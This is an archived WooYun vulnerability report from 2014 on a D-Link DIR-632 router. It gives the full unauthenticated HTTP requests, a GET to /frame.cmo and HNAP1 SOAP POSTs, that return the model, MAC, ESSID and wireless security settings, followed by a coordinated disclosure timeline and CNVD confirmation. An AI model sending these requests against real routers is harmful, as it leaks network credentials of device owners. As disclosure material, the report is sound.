乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-18: 细节已通知厂商并且等待厂商处理中 2014-07-23: 厂商已经确认,细节仅向厂商公开 2014-07-26: 细节向第三方安全合作伙伴开放 2014-09-16: 细节向核心白帽子及相关领域专家公开 2014-09-26: 细节向普通白帽子公开 2014-10-06: 细节向实习白帽子公开 2014-10-16: 细节向公众公开
D-Link某款路由发送特定POST包可获取essid等信息
型号:
var CMOm17n_lang="EN";var CMOmodel_name="DIR-632";var CMOhw_version="A1";var CMOversion="1.04";var CMOwlan0_mode="rt";var CMOmanufacturer = "D-Link";
获取型号:
GET /frame.cmo HTTP/1.1Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveHost: 地址:8080
获取mac等信息
POST /HNAP1/ HTTP/1.0Connection: keep-aliveContent-Length: 387SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSettings"Host: 地址:8080Accept: text/html, */*Accept-Encoding: deflate, gzip, identityUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"> <RadioID>RADIO_24GHz</RadioID> </GetWLanRadioSettings> </soap:Body></soap:Envelope>
获取essid等信息
POST /HNAP1/ HTTP/1.0Connection: keep-aliveContent-Length: 387SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"Host: 地址:8080Accept: text/html, */*Accept-Encoding: deflate, gzip, identityUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"> <RadioID>RADIO_24GHz</RadioID> </GetWLanRadioSecurity> </soap:Body></soap:Envelope>
联系厂商
危害等级:中
漏洞Rank:7
确认时间:2014-07-23 08:24
cnvd未直接在实例和本地复现,根据图片确认,由cnvd按以往联系渠道向友讯中国公司通报。
暂无